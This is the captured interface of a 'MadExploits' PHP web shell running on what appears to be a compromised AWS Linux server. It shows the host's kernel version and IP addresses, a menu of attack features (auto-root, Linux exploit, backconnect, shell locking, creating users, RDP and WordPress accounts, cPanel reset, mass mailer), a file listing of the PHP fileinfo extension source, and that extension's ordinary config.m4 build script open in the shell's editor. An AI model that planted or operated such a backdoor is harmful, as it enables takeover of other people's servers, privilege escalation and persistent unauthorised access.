Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.227.111.48
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
fileinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
libmagic
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
CREDITS
92
B
-rw-r--r--
Makefile
17.33
KB
-rw-r--r--
Makefile.frag
58
B
-rw-r--r--
Makefile.fragments
74
B
-rw-r--r--
Makefile.objects
8.41
KB
-rw-r--r--
config.h
1.75
KB
-rw-r--r--
config.h.in
1.65
KB
-rw-r--r--
config.log
19.57
KB
-rw-r--r--
config.m4
1.52
KB
-rw-r--r--
config.nice
114
B
-rwxr-xr-x
config.status
20.77
KB
-rwxr-xr-x
config.w32
542
B
-rw-r--r--
configure
431.51
KB
-rwxr-xr-x
configure.ac
5.19
KB
-rw-r--r--
create_data_file.php
472
B
-rw-r--r--
data_file.c
40.56
MB
-rw-r--r--
fileinfo.c
12.21
KB
-rw-r--r--
fileinfo.dep
5.05
KB
-rw-r--r--
fileinfo.la
808
B
-rw-r--r--
fileinfo.lo
307
B
-rw-r--r--
fileinfo.stub.php
1.45
KB
-rw-r--r--
fileinfo_arginfo.h
3.67
KB
-rw-r--r--
generate_patch.sh
358
B
-rw-r--r--
libmagic.patch
85.56
KB
-rw-r--r--
libtool
206.17
KB
-rwxr-xr-x
magicdata.patch
1.53
KB
-rw-r--r--
php_fileinfo.h
1.34
KB
-rw-r--r--
run-tests.php
134.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.m4
PHP_ARG_ENABLE([fileinfo], [for fileinfo support], [AS_HELP_STRING([--disable-fileinfo], [Disable fileinfo support])], [yes]) if test "$PHP_FILEINFO" != "no"; then libmagic_sources=" \ libmagic/apprentice.c libmagic/apptype.c libmagic/ascmagic.c \ libmagic/cdf.c libmagic/cdf_time.c libmagic/compress.c \ libmagic/encoding.c libmagic/fsmagic.c libmagic/funcs.c \ libmagic/is_json.c libmagic/is_tar.c libmagic/magic.c libmagic/print.c \ libmagic/readcdf.c libmagic/softmagic.c libmagic/der.c \ libmagic/buffer.c libmagic/is_csv.c" AC_MSG_CHECKING([for strcasestr]) AC_RUN_IFELSE([AC_LANG_SOURCE([[ #include <string.h> #include <strings.h> #include <stdlib.h> int main(void) { char *s0, *s1, *ret; s0 = (char *) malloc(42); s1 = (char *) malloc(8); memset(s0, 'X', 42); s0[24] = 'Y'; s0[26] = 'Z'; s0[41] = '\0'; memset(s1, 'x', 8); s1[0] = 'y'; s1[2] = 'Z'; s1[7] = '\0'; ret = strcasestr(s0, s1); return !(NULL != ret); } ]])],[ dnl using the platform implementation AC_MSG_RESULT(yes) ],[ AC_MSG_RESULT(no) AC_MSG_NOTICE(using libmagic strcasestr implementation) libmagic_sources="$libmagic_sources libmagic/strcasestr.c" ],[AC_MSG_RESULT([skipped, cross-compiling])]) PHP_NEW_EXTENSION(fileinfo, fileinfo.c $libmagic_sources, $ext_shared,,-I@ext_srcdir@/libmagic) PHP_ADD_BUILD_DIR($ext_builddir/libmagic) AC_CHECK_FUNCS([utimes strndup]) PHP_ADD_MAKEFILE_FRAGMENT fi
Close